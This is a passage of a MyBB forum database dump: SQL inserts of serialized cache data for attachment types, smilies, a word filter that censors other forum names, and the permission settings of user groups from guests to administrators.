Document\";s:8:\"mimetype\";s:24:\"application/vnd.ms-excel\";s:9:\"extension\";s:3:\"xls\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/xls.gif\";}s:4:\"xlsx\";a:6:{s:4:\"atid\";s:2:\"19\";s:4:\"name\";s:29:\"Microsoft Excel 2007 Document\";s:8:\"mimetype\";s:65:\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\";s:9:\"extension\";s:4:\"xlsx\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/xls.gif\";}s:3:\"ppt\";a:6:{s:4:\"atid\";s:2:\"20\";s:4:\"name\";s:29:\"Microsoft PowerPoint Document\";s:8:\"mimetype\";s:29:\"application/vnd.ms-powerpoint\";s:9:\"extension\";s:3:\"ppt\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/ppt.gif\";}s:4:\"pptx\";a:6:{s:4:\"atid\";s:2:\"21\";s:4:\"name\";s:34:\"Microsoft PowerPoint 2007 Document\";s:8:\"mimetype\";s:73:\"application/vnd.openxmlformats-officedocument.presentationml.presentation\";s:9:\"extension\";s:4:\"pptx\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/ppt.gif\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('smilies', 'a:16:{i:41;a:6:{s:3:\"sid\";s:2:\"41\";s:4:\"name\";s:5:\"Smile\";s:4:\"find\";s:2:\":)\";s:5:\"image\";s:33:\"/images/smilies/Clean/smiling.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:42;a:6:{s:3:\"sid\";s:2:\"42\";s:4:\"name\";s:8:\"Confused\";s:4:\"find\";s:3:\":?:\";s:5:\"image\";s:29:\"/images/smilies/Clean/huh.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:43;a:6:{s:3:\"sid\";s:2:\"43\";s:4:\"name\";s:4:\"Cool\";s:4:\"find\";s:6:\":cool:\";s:5:\"image\";s:30:\"/images/smilies/Clean/cool.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:44;a:6:{s:3:\"sid\";s:2:\"44\";s:4:\"name\";s:9:\"Surprised\";s:4:\"find\";s:2:\":O\";s:5:\"image\";s:35:\"/images/smilies/Clean/surprised.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:45;a:6:{s:3:\"sid\";s:2:\"45\";s:4:\"name\";s:5:\"Angel\";s:4:\"find\";s:7:\":angel:\";s:5:\"image\";s:31:\"/images/smilies/Clean/angel.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:46;a:6:{s:3:\"sid\";s:2:\"46\";s:4:\"name\";s:10:\"Embarrased\";s:4:\"find\";s:12:\":embarrased:\";s:5:\"image\";s:36:\"/images/smilies/Clean/embarrased.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:47;a:6:{s:3:\"sid\";s:2:\"47\";s:4:\"name\";s:4:\"Wink\";s:4:\"find\";s:2:\";)\";s:5:\"image\";s:30:\"/images/smilies/Clean/wink.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:48;a:6:{s:3:\"sid\";s:2:\"48\";s:4:\"name\";s:6:\"Tounge\";s:4:\"find\";s:2:\":P\";s:5:\"image\";s:32:\"/images/smilies/Clean/tounge.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:49;a:6:{s:3:\"sid\";s:2:\"49\";s:4:\"name\";s:3:\"Lub\";s:4:\"find\";s:2:\"<3\";s:5:\"image\";s:29:\"/images/smilies/Clean/lub.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:50;a:6:{s:3:\"sid\";s:2:\"50\";s:4:\"name\";s:4:\"Grin\";s:4:\"find\";s:2:\":D\";s:5:\"image\";s:31:\"/images/smilies/Clean/happy.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:51;a:6:{s:3:\"sid\";s:2:\"51\";s:4:\"name\";s:3:\"Mad\";s:4:\"find\";s:7:\":angry:\";s:5:\"image\";s:29:\"/images/smilies/Clean/mad.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:52;a:6:{s:3:\"sid\";s:2:\"52\";s:4:\"name\";s:3:\"Sad\";s:4:\"find\";s:2:\":(\";s:5:\"image\";s:29:\"/images/smilies/Clean/sad.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:53;a:6:{s:3:\"sid\";s:2:\"53\";s:4:\"name\";s:6:\"Crying\";s:4:\"find\";s:3:\":\'(\";s:5:\"image\";s:32:\"/images/smilies/Clean/crying.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:54;a:6:{s:3:\"sid\";s:2:\"54\";s:4:\"name\";s:5:\"Hehe!\";s:4:\"find\";s:7:\":hehe!:\";s:5:\"image\";s:31:\"/images/smilies/Clean/hehe!.png\";s:9:\"disporder\";s:1:\"0\";s:13:\"showclickable\";s:1:\"1\";}i:39;a:6:{s:3:\"sid\";s:2:\"39\";s:4:\"name\";s:4:\"ROFL\";s:4:\"find\";s:8:\":roflol:\";s:5:\"image\";s:27:\"images/smilies/Clean/24.gif\";s:9:\"disporder\";s:1:\"1\";s:13:\"showclickable\";s:1:\"1\";}i:56;a:6:{s:3:\"sid\";s:2:\"56\";s:4:\"name\";s:5:\"Devil\";s:4:\"find\";s:6:\":evil:\";s:5:\"image\";s:31:\"/images/smilies/Clean/devil.png\";s:9:\"disporder\";s:1:\"2\";s:13:\"showclickable\";s:1:\"1\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('badwords', 'a:9:{i:1;a:3:{s:3:\"bid\";s:1:\"1\";s:7:\"badword\";s:10:\"hackforums\";s:11:\"replacement\";s:10:\"[censored]\";}i:2;a:3:{s:3:\"bid\";s:1:\"2\";s:7:\"badword\";s:9:\"sharecash\";s:11:\"replacement\";s:10:\"[censored]\";}i:3;a:3:{s:3:\"bid\";s:1:\"3\";s:7:\"badword\";s:8:\"shitcash\";s:11:\"replacement\";s:10:\"[censored]\";}i:7;a:3:{s:3:\"bid\";s:1:\"7\";s:7:\"badword\";s:6:\"hafeez\";s:11:\"replacement\";s:5:\"Jok3r\";}i:8;a:3:{s:3:\"bid\";s:1:\"8\";s:7:\"badword\";s:6:\"kamran\";s:11:\"replacement\";s:3:\"t3h\";}i:10;a:3:{s:3:\"bid\";s:2:\"10\";s:7:\"badword\";s:7:\"wrzhost\";s:11:\"replacement\";s:10:\"[censored]\";}i:11;a:3:{s:3:\"bid\";s:2:\"11\";s:7:\"badword\";s:15:\"l33thacking.com\";s:11:\"replacement\";s:15:\"l33thacking.net\";}i:12;a:3:{s:3:\"bid\";s:2:\"12\";s:7:\"badword\";s:5:\"kamz*\";s:11:\"replacement\";s:16:\"[Word Forbidden]\";}i:14;a:3:{s:3:\"bid\";s:2:\"14\";s:7:\"badword\";s:10:\"*lthackin*\";s:11:\"replacement\";s:18:\"[Forbidden to Use]\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('usergroups', 'a:17:{i:1;a:73:{s:3:\"gid\";s:1:\"1\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:6:\"Guests\";s:11:\"description\";s:77:\"The default group that all visitors are assigned to unless they\'re logged in.\";s:9:\"namestyle\";s:10:\"{username}\";s:9:\"usertitle\";s:12:\"Unregistered\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"0\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:1:\"0\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"0\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"0\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"0\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:2;a:73:{s:3:\"gid\";s:1:\"2\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:10:\"Registered\";s:11:\"description\";s:66:\"After registration, all users are placed in this group by default.\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:23:\"images/stars/yellow.png\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"3\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:2:\"20\";s:13:\"timebtwnposts\";s:2:\"30\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:4:\"2880\";}i:9;a:73:{s:3:\"gid\";s:1:\"9\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:6:\"Elite \";s:11:\"description\";s:29:\"Elite; Upgraded members group\";s:9:\"namestyle\";s:63:\"{username}\";s:9:\"usertitle\";s:13:\"Elite Member!\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:23:\"images/stars/orange.png\";s:5:\"image\";s:22:\"./images/ub/elite1.png\";s:9:\"disporder\";s:1:\"4\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"1\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:4:\"1000\";s:15:\"maxpmrecipients\";s:1:\"3\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"4\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"1\";s:12:\"canaddevents\";s:1:\"1\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"1\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:1:\"3\";s:17:\"maxreputationsday\";s:1:\"4\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:3:\"500\";s:14:\"cancustomtitle\";s:1:\"1\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:2:\"20\";s:13:\"timebtwnposts\";s:2:\"30\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:3;a:73:{s:3:\"gid\";s:1:\"3\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:5:\"Staff\";s:11:\"description\";s:35:\"These users can moderate any forum.\";s:9:\"namestyle\";s:62:\"{username}\";s:9:\"usertitle\";s:15:\"Super Moderator\";s:5:\"stars\";s:1:\"8\";s:9:\"starimage\";s:23:\"images/stars/purple.gif\";s:5:\"image\";s:23:\"./images/ub/staffit.png\";s:9:\"disporder\";s:1:\"6\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"1\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"1\";s:17:\"candenypmreceipts\";s:1:\"1\";s:7:\"pmquota\";s:4:\"3000\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:2:\"10\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"1\";s:16:\"canviewonlineips\";s:1:\"1\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"1\";s:13:\"showforumteam\";s:1:\"1\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:1:\"6\";s:17:\"maxreputationsday\";s:1:\"8\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"1\";s:12:\"canwarnusers\";s:1:\"1\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"3\";s:8:\"canmodcp\";s:1:\"1\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"1\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:4;a:73:{s:3:\"gid\";s:1:\"4\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:14:\"Administrators\";s:11:\"description\";s:39:\"The group all administrators belong to.\";s:9:\"namestyle\";s:69:\"{username}\";s:9:\"usertitle\";s:13:\"Administrator\";s:5:\"stars\";s:1:\"8\";s:9:\"starimage\";s:20:\"images/stars/red.gif\";s:5:\"image\";s:22:\"./images/ub/admin5.png\";s:9:\"disporder\";s:1:\"7\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"1\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"1\";s:17:\"candenypmreceipts\";s:1:\"1\";s:7:\"pmquota\";s:4:\"5000\";s:15:\"maxpmrecipients\";s:1:\"0\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"0\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"1\";s:16:\"canviewonlineips\";s:1:\"1\";s:5:\"cancp\";s:1:\"1\";s:10:\"issupermod\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"1\";s:13:\"showforumteam\";s:1:\"1\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:2:\"10\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"1\";s:12:\"canwarnusers\";s:1:\"1\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"1\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"1\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:5;a:73:{s:3:\"gid\";s:1:\"5\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:19:\"Awaiting Activation\";s:11:\"description\";s:84:\"Users that have not activated their account by email or manually been activated yet.\";s:9:\"namestyle\";s:46:\"{username}\";s:9:\"usertitle\";s:21:\"Account not Activated\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"0\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:2:\"20\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"1\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"0\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"0\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"1\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:6;a:73:{s:3:\"gid\";s:1:\"6\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";s:11:\"description\";s:37:\"These users moderate specific forums.\";s:9:\"namestyle\";s:61:\"{username}\";s:9:\"usertitle\";s:9:\"Moderator\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/blue.png\";s:5:\"image\";s:20:\"./images/ub/mod1.png\";s:9:\"disporder\";s:1:\"5\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"1\";s:17:\"candenypmreceipts\";s:1:\"1\";s:7:\"pmquota\";s:4:\"1500\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"1\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1